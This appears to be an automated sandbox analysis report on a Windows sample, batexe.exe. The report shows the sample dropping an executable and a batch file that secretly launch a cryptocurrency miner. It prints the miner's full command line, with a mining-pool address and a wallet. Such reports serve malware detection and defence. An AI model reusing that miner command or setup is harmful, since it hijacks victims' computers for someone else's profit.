Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
294s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
18/02/2024, 06:25
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4824 b2e.exe 3596 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3596 cpuminer-sse2.exe 3596 cpuminer-sse2.exe 3596 cpuminer-sse2.exe 3596 cpuminer-sse2.exe 3596 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2400-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2400 wrote to memory of 4824 2400 batexe.exe 74 PID 2400 wrote to memory of 4824 2400 batexe.exe 74 PID 2400 wrote to memory of 4824 2400 batexe.exe 74 PID 4824 wrote to memory of 2192 4824 b2e.exe 75 PID 4824 wrote to memory of 2192 4824 b2e.exe 75 PID 4824 wrote to memory of 2192 4824 b2e.exe 75 PID 2192 wrote to memory of 3596 2192 cmd.exe 78 PID 2192 wrote to memory of 3596 2192 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\A901.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\A901.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A901.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD57.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3596
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.8MB
MD5786576d1c8ca39b9d6838acf24b03020
SHA1c32b84113168f12eeb05512b6d4952e48efdf515
SHA25694b97b0b1e87393550c4f4f7cb7fe06e539982a5fc844174a6dc686450a6fd13
SHA512250f63757ca69cbc70f4ac6845decaceae65d7fb51dbd1e12150ee2e8682be070f17ab3e63f8fc12820d34e17a5786ab7e0547c5cf3c0ee1a1afccc30c4de565
-
Filesize
11.9MB
MD504d50cbb43d10f6fe96d0598bc8cc6bb
SHA1a0cf4634ad63f62a0207ac0290241565baf29667
SHA256d715c6d19d83e735ba8d0578eef43397c18770b40f46adfb58a8fa0061d6fb61
SHA5121117949820b865112f59bd4d6d13b3b7f936d2d792a875de529015fa1717cc8d8107d0be738ac2c0dbb92b05e3f0052a9ecdb4eb6154c3960ffbcb41ec4810cd
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
291KB
MD52904d967fc14aae3d659869521381a72
SHA1d3fb2f08794c9eea8c9b07d070c388a35444e74e
SHA256c999217e26e3123e2e3c5c3d5e5c2397c9204cab970f5955b5224f2934657d75
SHA51243655b13534114e3ec55cade1f1fcaa269bae19dd762e7b3698fdf45e449a35487d2d528cc3f2edad49afb157fe0c6e607b640c12e4793852d21d144d1a3b429
-
Filesize
42KB
MD5e82fb282ee4f91dcf656a44e54434264
SHA1446bb698df4182e1fc855b3ae15cb3390c87b214
SHA2567b971ee9e53270359e987aced51dfdaead26987651fff474db6907dca395c0bc
SHA512c4e5f4506f8a8ca06185fcff5496b3eb1e187daf3ed1223581fd5d230e5007ede6ea45ecd5ba2127e115b1d2074ecde53d263d8ec67214787d2c86f06664abc3
-
Filesize
6.4MB
MD52a268d17d6422e65ed5977bcd8ad9852
SHA16d0d46aa6799217efd7bbfcd5309d704706a639e
SHA256b8f81b7afa44e9bbd4f710a8a7268921ada69ab029ce83c4f8f7ceea04462d80
SHA512ce0068cf7ec2771151fc0e5220207d40a325207a02577631998895b6e1ec63ae30b6c0a320efac2886fe06e532e5df3959dbecb3ab057502a72430cd225d1d3a
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
11.4MB
MD5c9ae142c1510e09336a6ec3c4f956503
SHA1955797b076daf02c2157e514a95099c71fea2512
SHA256c69d02d880d31c0302122eabcb4a2dd70baef0371c50bb67db0c249c84130d84
SHA51260184072570a41aa1070a6c1ea671ec3aa092a7d5f8fc6d0b6cce145a0b033e781c8c6601c87b8bc15b6f5d08310ac3637cf340d4348cf1f9bd4d20b11885956
-
Filesize
9.0MB
MD5437b0752117276fb2f6005a9ae35bc08
SHA1fc536ce248d6c20c4ed7ee4847d8990f47628301
SHA25602ef36b2d4099133e64c0df63ece8cde0682ba667797798e35505b0e5df26e06
SHA51245dfce65c10a10e53ed4d2fb5e4ddf067f881ac234ed31137c452c573f3626eb5cb6abb44a3e3fce3cb4a1b67cf7cd049bdd630665a169df89382a1bd18d8755